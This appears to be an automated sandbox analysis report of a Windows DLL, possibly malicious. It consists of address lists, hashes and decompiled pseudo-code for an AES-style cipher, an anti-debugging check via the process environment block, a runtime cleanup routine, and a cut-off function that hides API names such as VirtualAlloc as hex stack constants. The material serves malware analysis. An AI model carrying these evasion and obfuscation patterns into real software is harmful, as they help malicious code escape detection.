0x6f321a5b
0x6f321a5b
0x6f321a5d
0x6f321a60
0x6f321a66
0x6f321a66
0x6f321a6c
0x6f321a72
0x6f321a78
0x6f321a7e
0x6f321a84
0x6f321aa5
0x6f321aaa
0x6f321aaf
0x6f321ab3
0x6f321ab9
0x6f321abc
0x6f321acf
0x6f321acf
0x6f321add
0x6f321ae2
0x6f321ae5
0x6f321aeb
0x6f321aed
0x6f321b4b
0x6f321b51
0x6f321b59
0x6f321b5e
0x6f321b64
0x6f321b65
0x00000000
0x00000000
0x00000000
0x6f321abe
0x6f321abe
0x6f321ac1
0x6f321ac3
0x00000000
0x6f321ac5
0x6f321ac5
0x6f321ac8
0x00000000
0x6f321aca
0x6f321aca
0x6f321acd
0x00000000
0x00000000
0x00000000
0x00000000
0x6f321acd
0x6f321ac8
0x6f321ac3
0x6f321b67
0x6f321b68
0x00000000
0x6f321aef
0x6f321aef
0x6f321af5
0x6f321afd
0x6f321b02
0x6f321b02
0x6f321b11
0x6f321b11
0x6f321b19
0x6f321b1f
0x6f321b25
0x6f321b2c
0x6f321b2f
0x6f321b31
0x6f321b41
0x6f321b46
0x00000000
0x6f321a3a
0x6f321a3a
0x6f321a4b
0x6f321a4b
0x6f321b6e
0x6f321b6e
0x6f321b76
0x6f321b7e
0x6f321b83
0x6f321996
0x6f321999
0x6f32199b
0x6f3219b0
0x00000000
0x6f32199d
0x6f32199d
0x6f3219a3
0x6f3219a8
0x6f32199b
0x6f321b8a
0x6f321b95
0x00000000
0x00000000
0x00000000
0x6f3218de
0x6f3218af
0x6f3218b1
0x6f3218b2
0x6f3218b6
0x6f3218b6

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43af9570da1f8173e2aa626fb019d98aaf4dc538ee6840aaa1750e5783770195
Instruction ID: 5fe14ed7a0a80bf4ace31e99f3fecb3e4a5e68094303f3b16571f5dee980d8fe
Opcode Fuzzy Hash: 43af9570da1f8173e2aa626fb019d98aaf4dc538ee6840aaa1750e5783770195
Instruction Fuzzy Hash: 88418FB5C04618AEDB10DF69CD88AEABBF9EF45304F1442DDE45DD3240DA36AE858F50

Uniqueness

Uniqueness Score: -1.00%

Function 6F31B2B0, Relevance: .4, Instructions: 403
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F31B2B0(signed int* __ecx, signed char* __edx, unsigned int* _a4) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				unsigned int _v24;
				signed int _v28;
				unsigned int _v32;
				unsigned int _v36;
				signed int* _t261;
				signed int* _t262;
				unsigned int _t263;
				unsigned int _t269;
				unsigned int _t291;
				unsigned int _t296;
				unsigned int _t310;
				unsigned int _t312;
				signed char _t318;
				unsigned int _t340;
				unsigned int* _t427;
				unsigned int _t496;
				unsigned int _t500;
				unsigned int _t514;
				unsigned int _t521;
				unsigned int _t529;
				unsigned int _t537;
				unsigned int _t568;
				unsigned int _t573;
				unsigned int _t589;
				signed int _t591;
				signed int _t593;

				_t261 = __ecx[1];
				_v8 = (__edx[7] & 0x000000ff) << 8;
				_v8 = _v8 | __edx[6] & 0x000000ff;
				_v8 = _v8 << 8;
				_v8 = _v8 | __edx[5] & 0x000000ff;
				_v8 = _v8 << 8;
				_v8 = _v8 | __edx[4] & 0x000000ff;
				_v8 = _v8 ^ _t261[1];
				_v16 = (__edx[0xb] & 0x000000ff) << 8;
				_t291 = ((((__edx[3] & 0x000000ff) << 0x00000008 | __edx[2] & 0x000000ff) << 0x00000008 | __edx[1] & 0x000000ff) << 0x00000008 |  *__edx & 0x000000ff) ^  *_t261;
				_v20 = _t291;
				_t589 = (((_v16 | __edx[0xa] & 0x000000ff) << 0x00000008 | __edx[9] & 0x000000ff) << 0x00000008 | __edx[8] & 0x000000ff) ^ _t261[2];
				_v12 = (__edx[0xf] & 0x000000ff) << 8;
				_v12 = _v12 | __edx[0xe] & 0x000000ff;
				_v12 = _v12 << 8;
				_v12 = _v12 | __edx[0xd] & 0x000000ff;
				_v12 = _v12 << 8;
				_v16 = _t589;
				_t500 = (_v12 | __edx[0xc] & 0x000000ff) ^ _t261[3];
				_t262 =  &(_t261[4]);
				_t340 = ( *__ecx >> 1) - 1;
				_v12 = _t500;
				_v36 = _t340;
				if(_t340 > 0) {
					do {
						_v24 =  *(0x6f35f690 + (_t500 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_t589 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v8 >> 0x18) * 4) ^  *(0x6f35fa90 + (_t291 & 0x000000ff) * 4) ^  *_t262;
						_v28 =  *(0x6f360690 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35f690 + (_t291 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v16 >> 0x18) * 4) ^  *(0x6f35fa90 + (_v8 & 0x000000ff) * 4) ^ _t262[1];
						_t312 = _v16;
						_v32 =  *(0x6f35f690 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_t291 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v12 >> 0x18) * 4) ^  *(0x6f35fa90 + (_t312 & 0x000000ff) * 4) ^ _t262[2];
						_t318 =  *(0x6f35f690 + (_t312 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v20 >> 0x18) * 4) ^  *(0x6f35fa90 + (_v12 & 0x000000ff) * 4) ^ _t262[3];
						_v20 =  *(0x6f35f690 + (_t318 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_v32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v28 >> 0x18) * 4) ^  *(0x6f35fa90 + (_v24 & 0x000000ff) * 4) ^ _t262[4];
						_v8 =  *(0x6f360690 + (_t318 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35f690 + (_v24 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v32 >> 0x18) * 4);
						_t568 = _v28;
						_t591 = _v8 ^  *(0x6f35fa90 + (_t568 & 0x000000ff) * 4);
						_v8 = _t591;
						_v8 = _t591 ^ _t262[5];
						_v16 =  *(0x6f35f690 + (_t568 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_v24 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_t318 >> 0x18) * 4);
						_t573 = _v32;
						_t593 = _v16 ^  *(0x6f35fa90 + (_t573 & 0x000000ff) * 4);
						_v16 = _t593;
						_v16 = _t593 ^ _t262[6];
						_t589 = _v16;
						_t291 = _v20;
						_t500 =  *(0x6f35f690 + (_t573 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_v28 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v24 >> 0x18) * 4) ^  *(0x6f35fa90 + (_t318 & 0x000000ff) * 4) ^ _t262[7];
						_t496 = _v36 - 1;
						_t262 =  &(_t262[8]);
						_v12 = _t500;
						_v36 = _t496;
					} while (_t496 > 0);
				}
				_v24 =  *(0x6f35f690 + (_t500 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_t589 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v8 >> 0x18) * 4) ^  *(0x6f35fa90 + (_t291 & 0x000000ff) * 4) ^  *_t262;
				_v28 =  *(0x6f360690 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35f690 + (_t291 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_t589 >> 0x18) * 4) ^  *(0x6f35fa90 + (_v8 & 0x000000ff) * 4) ^ _t262[1];
				_t514 = _v16;
				_t296 =  *(0x6f35f690 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_t291 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v12 >> 0x18) * 4) ^  *(0x6f35fa90 + (_t514 & 0x000000ff) * 4) ^ _t262[2];
				_v16 = _t296;
				_t521 =  *(0x6f35f690 + (_t514 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f360690 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f35e968 + (_v20 >> 0x18) * 4) ^  *(0x6f35fa90 + (_v12 & 0x000000ff) * 4) ^ _t262[3];
				_v36 = _t521;
				_v20 = (( *((_t296 >> 0x00000010 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ ( *((_v28 >> 0x18) + 0x6f35ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_t521 >> 0x00000008 & 0x000000ff) + 0x6f35ed68) & 0x000000ff) << 0x00000008 ^  *((_v24 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ _t262[4];
				_v12 = (( *((_t521 >> 0x00000010 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ ( *((_v16 >> 0x18) + 0x6f35ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_v24 >> 0x00000008 & 0x000000ff) + 0x6f35ed68) & 0x000000ff) << 0x00000008 ^  *((_v28 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ _t262[5];
				_t529 = _v28;
				_t310 = (( *((_v24 >> 0x00000010 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ ( *((_v36 >> 0x18) + 0x6f35ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_t529 >> 0x00000008 & 0x000000ff) + 0x6f35ed68) & 0x000000ff) << 0x00000008 ^  *((_v16 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ _t262[6];
				_t427 = _a4;
				_t537 = (( *((_t529 >> 0x00000010 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ ( *((_v24 >> 0x18) + 0x6f35ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_v16 >> 0x00000008 & 0x000000ff) + 0x6f35ed68) & 0x000000ff) << 0x00000008 ^  *((_v36 & 0x000000ff) + 0x6f35ed68) & 0x000000ff ^ _t262[7];
				_t263 = _v20;
				 *_t427 = _t263;
				_t427[0] = _t263 >> 8;
				_t427[0] = _v20 >> 0x10;
				_t427[0] = _v20 >> 0x18;
				_t269 = _v12;
				_t427[1] = _t269;
				_t427[1] = _t269 >> 8;
				_t427[1] = _v12 >> 0x10;
				_t427[1] = _v12 >> 0x18;
				_t427[2] = _t310 >> 8;
				_t427[2] = _t310 >> 0x10;
				_t427[3] = _t537 >> 8;
				_t427[2] = _t310;
				_t427[3] = _t537;
				_t427[2] = _t310 >> 0x18;
				_t427[3] = _t537 >> 0x10;
				_t427[3] = _t537 >> 0x18;
				return 0;
			}

0x6f31b2e0
0x6f31b2e3
0x6f31b2ea
0x6f31b2ed
0x6f31b2f5
0x6f31b2fc
0x6f31b300
0x6f31b309
0x6f31b313
0x6f31b31f
0x6f31b32a
0x6f31b33a
0x6f31b340
0x6f31b347
0x6f31b34e
0x6f31b352
0x6f31b355
0x6f31b362
0x6f31b367
0x6f31b36a
0x6f31b36f
0x6f31b370
0x6f31b373
0x6f31b378
0x6f31b380
0x6f31b3bd
0x6f31b3fc
0x6f31b40a
0x6f31b441
0x6f31b46f
0x6f31b4b3
0x6f31b4dd
0x6f31b4e0
0x6f31b4e9
0x6f31b4f2
0x6f31b4f8
0x6f31b526
0x6f31b529
0x6f31b538
0x6f31b541
0x6f31b54e
0x6f31b557
0x6f31b574
0x6f31b581
0x6f31b584
0x6f31b585
0x6f31b588
0x6f31b58b
0x6f31b58e
0x6f31b380
0x6f31b5d3
0x6f31b611
0x6f31b626
0x6f31b65a
0x6f31b660
0x6f31b686
0x6f31b68f
0x6f31b6dc
0x6f31b72b
0x6f31b72e
0x6f31b776
0x6f31b7b9
0x6f31b7bc
0x6f31b7bf
0x6f31b7c2
0x6f31b7c7
0x6f31b7d0
0x6f31b7d9
0x6f31b7dc
0x6f31b7df
0x6f31b7e5
0x6f31b7ee
0x6f31b7f7
0x6f31b7ff
0x6f31b807
0x6f31b80f
0x6f31b814
0x6f31b81e
0x6f31b825
0x6f31b828
0x6f31b82d
0x6f31b834

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213fa77749acba832558b9e960521c68ba95a42b0114bc713899f299b9bf7264
Instruction ID: f14f7dd31c3e75e1db50c179eda62c84aa75000ba30ae276977b5b875e761aa8
Opcode Fuzzy Hash: 213fa77749acba832558b9e960521c68ba95a42b0114bc713899f299b9bf7264
Instruction Fuzzy Hash: 2F0283709041658FDB4CDF6AD4F047DFBF2EBCA211755829ED5822B782C2386622DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31B080, Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E6F31B080(void* __ebx, signed int* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				intOrPtr _v292;
				signed int _v296;
				intOrPtr _v300;
				signed int _t81;
				intOrPtr _t85;
				intOrPtr* _t87;
				signed int* _t143;
				signed char _t146;
				signed int _t151;
				intOrPtr* _t153;
				signed char* _t154;
				signed int _t178;
				signed int* _t179;
				void* _t181;
				void* _t183;
				signed int _t184;

				_t81 =  *0x6f34609c; // 0x206de7d6
				_v12 = _t81 ^ _t184;
				_t181 = __edx;
				_t143 = __ecx;
				E6F31D230(__edi,  &_v296, 0, 0x118);
				_t178 =  &(_t143[2]);
				_t143[1] = _t178;
				_t85 = E6F31A140( &_v296, _t181);
				_v300 = _t85;
				if(_t85 == 0) {
					_t151 = _v296;
					 *_t143 = _t151;
					_t153 = (_t151 << 4) + _v292;
					 *_t178 =  *_t153;
					 *((intOrPtr*)(_t178 + 4)) =  *((intOrPtr*)(_t153 + 4));
					 *((intOrPtr*)(_t178 + 8)) =  *((intOrPtr*)(_t153 + 8));
					_t154 = _t153 - 0x10;
					 *((intOrPtr*)(_t178 + 0xc)) =  *((intOrPtr*)(_t153 + 0xc));
					_t179 = _t178 + 0x10;
					_t183 =  *_t143 - 1;
					while(_t183 > 0) {
						_t183 = _t183 - 1;
						 *_t179 =  *(0x6f35e968 + ( *((_t154[3] & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f360690 + ( *((_t154[2] & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35f690 + ( *((_t154[1] & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35fa90 + ( *(( *_t154 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4);
						_t179[1] =  *(0x6f360690 + ( *((_t154[4] >> 0x00000010 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35f690 + ( *((_t154[4] >> 0x00000008 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35e968 + ( *((_t154[4] >> 0x18) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35fa90 + ( *((_t144 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4);
						_t179[2] =  *(0x6f360690 + ( *((_t154[8] >> 0x00000010 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35f690 + ( *((_t154[8] >> 0x00000008 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35e968 + ( *((_t154[8] >> 0x18) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35fa90 + ( *((_t145 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4);
						_t146 = _t154[0xc];
						_t154 = _t154 - 0x10;
						_t179[3] =  *(0x6f360690 + ( *((_t146 >> 0x00000010 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35f690 + ( *((_t146 >> 0x00000008 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35e968 + ( *((_t146 >> 0x18) + 0x6f35e868) & 0x000000ff) * 4) ^  *(0x6f35fa90 + ( *((_t146 & 0x000000ff) + 0x6f35e868) & 0x000000ff) * 4);
						_t179 =  &(_t179[4]);
					}
					 *_t179 =  *_t154;
					_t179[1] = _t154[4];
					_t179[2] = _t154[8];
					_t179[3] = _t154[0xc];
				}
				_t87 =  *0x6f32d168; // 0x6f31d230
				 *_t87(0, 0x118);
				return E6F31C65E(_v12 ^ _t184,  &_v296);
			}

0x6f31b089
0x6f31b090
0x6f31b0a1
0x6f31b0a6
0x6f31b0a8
0x6f31b0b0
0x6f31b0b5
0x6f31b0be
0x6f31b0c6
0x6f31b0ce
0x6f31b0d4
0x6f31b0da
0x6f31b0df
0x6f31b0e7
0x6f31b0ec
0x6f31b0f2
0x6f31b0f8
0x6f31b0fb
0x6f31b0fe
0x6f31b103
0x6f31b106
0x6f31b114
0x6f31b158
0x6f31b1ad
0x6f31b203
0x6f31b206
0x6f31b20e
0x6f31b25c
0x6f31b25f
0x6f31b262
0x6f31b26c
0x6f31b271
0x6f31b277
0x6f31b27d
0x6f31b27d
0x6f31b28e
0x6f31b293
0x6f31b2ae

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e133b4286eb2d15e99538647e9fe230daa97aec0e0679afede666e8cdc67b75
Instruction ID: da31ca06bf1136654e4e0f537a27dd9d81444f26b4a9967514c0e304c99fc490
Opcode Fuzzy Hash: 7e133b4286eb2d15e99538647e9fe230daa97aec0e0679afede666e8cdc67b75
Instruction Fuzzy Hash: 175143705046698FD740CF3AC840965BBF5EB9A311B5981E9E598CF342C235E5B6CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F3214AE, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3214AE(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6F3203AE(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6f3214bb
0x6f3214bd
0x6f3214c0
0x6f3214c3
0x6f3214c6
0x6f3214d7
0x6f3214d9
0x6f3214c8
0x6f3214cc
0x6f3214d5
0x00000000
0x00000000
0x6f3214d5
0x6f3214e0

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6e38d98d3da71006e7a19da4402c2d27cb404d58e6ce93ddf7320851fb6630
Instruction ID: c6b9e2babd71bc49deae835ac31e7f82cf15251498fc50a5c5a00380b1864995
Opcode Fuzzy Hash: 6d6e38d98d3da71006e7a19da4402c2d27cb404d58e6ce93ddf7320851fb6630
Instruction Fuzzy Hash: C6E08632911238EBCB10DBC9C540D99F3FCEB05A11B11019BF948D3110C272DE00C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6F32429D, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F32429D(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6f346790) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6F31FEFF(_t46);
							E6F324608( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6F31FEFF(_t47);
							E6F324706( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6F31FEFF( *((intOrPtr*)(_t74 + 0x7c)));
						E6F31FEFF( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6F324410( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6f346260) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6F31FEFF(_t31);
							E6F31FEFF( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6F31FEFF(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6F31FEFF(_t74);
			}

0x6f3242a5
0x6f3242a9
0x6f3242b1
0x6f3242ba
0x6f3242bf
0x6f3242c6
0x6f3242ce
0x6f3242d6
0x6f3242e1
0x6f3242e7
0x6f3242e8
0x6f3242f0
0x6f3242f8
0x6f324303
0x6f324309
0x6f32430d
0x6f324318
0x6f32431e
0x6f3242bf
0x6f32431f
0x6f324327
0x6f32433a
0x6f32434d
0x6f32435b
0x6f324366
0x6f32436b
0x6f324374
0x6f32437c
0x6f32437d
0x6f324383
0x6f324386
0x6f324389
0x6f324390
0x6f324392
0x6f324396
0x6f32439e
0x6f3243a5
0x6f3243ab
0x6f3243ac
0x6f3243ac
0x6f3243b3
0x6f3243b5
0x6f3243ba
0x6f3243c2
0x6f3243c7
0x6f3243c8
0x6f3243c8
0x6f3243cb
0x6f3243ce
0x6f3243d1
0x6f3243d4
0x6f3243d4
0x6f3243e6

APIs

___free_lconv_mon.LIBCMT ref: 6F3242E1

Part of subcall function 6F324608: _free.LIBCMT ref: 6F324625
Part of subcall function 6F324608: _free.LIBCMT ref: 6F324637
Part of subcall function 6F324608: _free.LIBCMT ref: 6F324649
Part of subcall function 6F324608: _free.LIBCMT ref: 6F32465B
Part of subcall function 6F324608: _free.LIBCMT ref: 6F32466D
Part of subcall function 6F324608: _free.LIBCMT ref: 6F32467F
Part of subcall function 6F324608: _free.LIBCMT ref: 6F324691
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246A3
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246B5
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246C7
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246D9
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246EB
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246FD

_free.LIBCMT ref: 6F3242D6

Part of subcall function 6F31FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F3242F8
_free.LIBCMT ref: 6F32430D
_free.LIBCMT ref: 6F324318
_free.LIBCMT ref: 6F32433A
_free.LIBCMT ref: 6F32434D
_free.LIBCMT ref: 6F32435B
_free.LIBCMT ref: 6F324366
_free.LIBCMT ref: 6F32439E
_free.LIBCMT ref: 6F3243A5
_free.LIBCMT ref: 6F3243C2
_free.LIBCMT ref: 6F3243DA

Strings

`b4o, xrefs: 6F324389

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: `b4o
API String ID: 161543041-924235887
Opcode ID: 1c52a69cac8bd5fda4b4769c6d81ed6b7ae397082b85260d2d024a57b05973b9
Instruction ID: 4abb448977194ee9e0d7da2c0094a99a8c0885b60f93c74de0275241441dfc60
Opcode Fuzzy Hash: 1c52a69cac8bd5fda4b4769c6d81ed6b7ae397082b85260d2d024a57b05973b9
Instruction Fuzzy Hash: 52316031608345DFEB149A39D880B8BB3E9BF80354F20461AE599DB692DF32F851CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F301305, Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F301305() {
				char _v5;
				intOrPtr _v9;
				intOrPtr _v13;
				char _v17;
				char _v18;
				intOrPtr _v22;
				intOrPtr _v26;
				char _v30;
				char _v31;
				char _v32;
				short _v34;
				intOrPtr _v38;
				char _v42;
				char _v43;
				intOrPtr _v47;
				intOrPtr _v51;
				char _v55;
				char _v56;
				intOrPtr _v60;
				char _v64;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t33;

				_v64 = 0x6e72656b;
				_v60 = 0x32336c65;
				_v56 = 0;
				_v55 = 0x74726956;
				_v51 = 0x416c6175;
				_v47 = 0x636f6c6c;
				_v43 = 0;
				_v42 = 0x74726956;
				_v38 = 0x466c6175;
				_v34 = 0x6572;
				_v32 = 0x65;
				_v31 = 0;
				_v30 = 0x61657243;
				_v26 = 0x754d6574;
				_v22 = 0x41786574;
				_v18 = 0;
				_v17 = 0x4c746547;
				_v13 = 0x45747361;
				_v9 = 0x726f7272;
				_v5 = 0;
				_t21 =  &_v64; // 0x6e72656b
				_t26 = GetModuleHandleA(_t21);
				if(_t26 != 0) {
					_t22 =  &_v55; // 0x74726956
					 *0x6f346064 = GetProcAddress(_t26, _t22);
					_t28 = _t26;
					_t23 =  &_v42; // 0x74726956
					 *0x6f346068 = GetProcAddress(_t28, _t23);
					_t30 = _t28;
					_t24 =  &_v30; // 0x61657243
